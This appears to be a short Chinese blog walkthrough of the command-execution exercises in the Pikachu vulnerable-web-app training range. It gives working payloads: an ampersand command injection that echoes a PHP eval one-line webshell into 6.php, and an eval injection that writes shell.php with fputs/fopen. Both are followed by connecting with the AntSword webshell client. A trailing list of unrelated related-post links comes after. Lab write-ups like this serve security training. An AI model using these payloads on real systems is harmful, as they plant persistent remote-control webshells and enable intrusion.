Pikachu靶场之RCE漏洞详解

一.exec "ping"

1.ping本机127.0.0.1

2.用&符拼接dir查看目录

3.&拼接echo输入一句话木马

127.0.0.1&echo "<?php @eval($_POST[cmd]);?>)" > 6.php

4.同级目录访问6.php,蚁剑连接

二:exec "eval"

1.后台使用了eval()函数,直接输入phpinfo();

2.写入一句话木马,访问shell.php

fputs(fopen('shell.php','w'),'<?php eval($_POST["cmd"])?>');

3.蚁剑连接

相关推荐
RH23121113 小时前
2026.4.16Linux 管道
java·linux·服务器
handler0114 小时前
Linux: 基本指令知识点(2)
linux·服务器·c语言·c++·笔记·学习
Web极客码14 小时前
深入了解WordPress网站访客意图
服务器·前端·wordpress
KKKlucifer14 小时前
国内堡垒机如何打通云网运维安全一体化
运维·安全
橙子也要努力变强14 小时前
Linux信号机制
linux·服务器·网络
FreeCultureBoy14 小时前
GDidees CMS - Arbitrary File Upload (CVE-2023-27178)
安全
wydd99_lll14 小时前
docker特权模式下逃逸
运维·docker·容器
程序猿编码15 小时前
给你的网络流量穿件“隐形衣“:手把手教你用对称加密打造透明安全隧道
linux·开发语言·网络·安全·linux内核
pengyi87101515 小时前
私网IP映射公网基础原理,搭配代理IP远程访问入门
linux·服务器·网络
mseaspring15 小时前
一款用于监控跨多台主机 Docker 容器的实时终端
运维·docker·容器